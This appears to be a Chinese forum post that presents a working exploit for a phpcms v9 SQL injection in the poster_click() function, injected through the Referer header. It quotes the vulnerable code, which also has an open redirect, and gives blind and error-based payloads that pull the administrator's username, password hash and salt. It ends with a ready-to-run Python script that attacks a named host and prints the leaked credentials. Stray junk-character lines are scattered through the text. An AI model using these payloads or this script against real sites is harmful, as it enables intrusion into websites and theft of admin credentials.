有人放出了 phpcms v9 的 0day，就随手写了个利用代码。注入点是 poster_click() 写入点击日志的 Referer 头，注入语句有两种形式：
4 o) t: Z1 G0 n: h4 n
问题函数：\phpcms\modules\poster\index.php 中的 poster_click()
! ]6 g: e ]( R) v; @; Z
public function poster_click() {
    // Click handler for a poster entry: logs the click, bumps the counter, then
    // redirects. Two untrusted inputs reach sinks in this function without any
    // sanitisation visible here: the Referer header (SQL INSERT below) and the
    // `url` query parameter (Location header at the end).
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;   // int-cast: not injectable
    $r = $this->db->get_one(array('id'=>$id));
    // No poster row for this id -> return early. The vulnerable INSERT is never
    // reached, so an exploit request must use an id that actually exists.
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // Cookie-controlled value; whether param::get_cookie() or s_db->insert()
    // escape it is not visible in this function -- TODO confirm.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();   // int-cast
        // SQL injection sink: the HTTP_REFERER constant (defined elsewhere,
        // presumably from $_SERVER['HTTP_REFERER'] -- confirm) is written
        // straight into the click log. Per this write-up it reaches the query
        // unescaped; the payload format (`1',(...),'1')#`) closes the 'referer'
        // value and supplies the two trailing columns, clicktime and type.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // Unless the poster has exactly one link setting, a caller-supplied
        // `url` overrides the configured target -- no validation at all.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    // Open redirect sink: $url may be fully attacker-controlled (see above) and
    // is emitted without any scheme/host check.
    header('Location: '.$url);
}
0 w- @; v: n7 u$ s, n# \
- q# a1 W. `) `5 |. V S# l1 N 8 S4 j& i- h* r0 H
' V' h) s7 Y6 l% l# }4 A: D# T
利用方式:
9 w" m" Y8 W; h8 ~6 h8 a$ ~& ^; u U2 u, h) A" q# V& @( }. j, p% d. i
1、可以采用盲注的手法（把下面的语句作为 Referer 头发送）：
Referer: 1',(select password from v9_admin where userid=1 and substr(password,4)='xxoo'),'1')#
) I C' A. [2 E0 f' T% T" x& ^7 A/ h0 u. U; K6 r: B
根据返回页面正常与否，逐段猜解 password 字段的值。
) F, Z, w* r5 C; L# |) @/ H% j! ^1 v0 h8 B& x$ {% J
2、下面这条报错注入语句是花开写的，随手附上：
- V- r0 n+ w. X5 r
1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
; ?, N' @9 ~ @2 a5 n- z" g5 _
此方法是报错注入手法（利用 rand(0)/group by 触发 Duplicate entry 报错，把管理员的 username、password、encrypt 带出来），原理自查。注意：若 v9_admin 表中有多条记录，内层子查询需加 limit 1，否则 MySQL 会报 "Subquery returns more than 1 row" 而非 Duplicate entry。
2 M( t6 [) p6 n0 |% g
3 b* K1 u2 M# @9 ~
利用程序（Python 2 脚本，依赖目标页面回显 MySQL 错误信息）：
5 U: `* C4 M9 D
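#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Error-based SQL injection PoC for phpcms v9 ``poster_click()``.

``poster_click()`` stores the request's Referer header in the click log via
``$this->s_db->insert()``.  The Referer sent below closes that string value,
supplies the remaining columns itself and appends a ``rand(0)``/``group by``
subquery, so MySQL aborts the INSERT with
``Duplicate entry '<username>_<password>_<encrypt>1'`` -- and the admin
record is read straight out of the error text echoed in the response.

Written for Python 2 (``httplib``); the small shim below lets it run
unchanged on Python 3.

Usage::

    phpcmsattack.py <host> <path> [poster_id]

``poster_id`` must be an existing poster row: ``poster_click()`` returns
before the vulnerable INSERT when the id does not exist.
"""
import re
import sys

try:
    import httplib  # Python 2
except ImportError:  # Python 3
    import http.client as httplib

USER_AGENT = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) "
              "Gecko/20090624 Firefox/3.5")

# Table name assumes the default ``v9_`` prefix; adjust for a custom prefix.
# With more than one admin row the inner subquery needs ``limit 1``.
PAYLOAD = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
           "(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a "
           "from information_schema.tables group by a)b),'1')#")

# The leaked record lands inside MySQL's duplicate-key message.
DUP_ENTRY_RE = re.compile(r"Duplicate entry '\w+'")

# Seconds to wait for the target before giving up (the original blocked forever).
TIMEOUT = 15


def attack(host=None, path=None, poster_id=None):
    """Send the injected request and print the leaked admin record.

    Arguments default to ``sys.argv[1]``, ``sys.argv[2]`` and ``sys.argv[3]``
    (the last falling back to ``"2"``) so the original no-argument call still
    works.  Returns the matched ``Duplicate entry '...'`` text, or ``None``
    when the response carried no MySQL error (patched target, error display
    disabled, or a non-existent poster id) -- the original indexed ``[0]``
    on an empty list and crashed with IndexError in that case.

    Raises whatever ``httplib`` raises on connection failure or timeout.
    """
    print("Code by Pax.Mac Team conqu3r!")
    print("Welcome to our zone!!!")
    if host is None:
        host = sys.argv[1]
    if path is None:
        path = sys.argv[2]
    if poster_id is None:
        poster_id = sys.argv[3] if len(sys.argv) > 3 else "2"

    headers = {
        "User-Agent": USER_AGENT,
        "Accept": "text/plain",
        "Referer": PAYLOAD,
    }
    # rstrip() avoids "//index.php" when the path is given as "/" or "/dir/".
    # ``sitespaceid`` is not read by poster_click() (it reads ``siteid``) but is
    # kept so the request matches the original write-up.
    request_path = (path.rstrip("/") +
                    "/index.php?m=poster&c=index&a=poster_click"
                    "&sitespaceid=1&id=%s" % poster_id)

    conn = httplib.HTTPConnection(host, timeout=TIMEOUT)
    try:
        conn.request("GET", request_path, headers=headers)
        response = conn.getresponse()
        # decode() works on both Python 2 str and Python 3 bytes.
        body = response.read().decode("utf-8", "replace")
    finally:
        conn.close()

    match = DUP_ENTRY_RE.search(body)
    if match is None:
        print("No 'Duplicate entry' error in the response (HTTP %d): "
              "target not vulnerable, errors hidden, or bad poster id."
              % response.status)
        return None
    print(match.group(0))
    return match.group(0)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Code by Pax.Mac Team conqu3r")
        print("Usage:")
        print("  phpcmsattack.py www.paxmac.org /")
        print("  phpcmsattack.py www.paxmac.org /phpcmsv9/ 2")
        sys.exit(1)
    attack()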
. Q X1 P9 P& z; s# j n1 I* s( a4 z0 A
|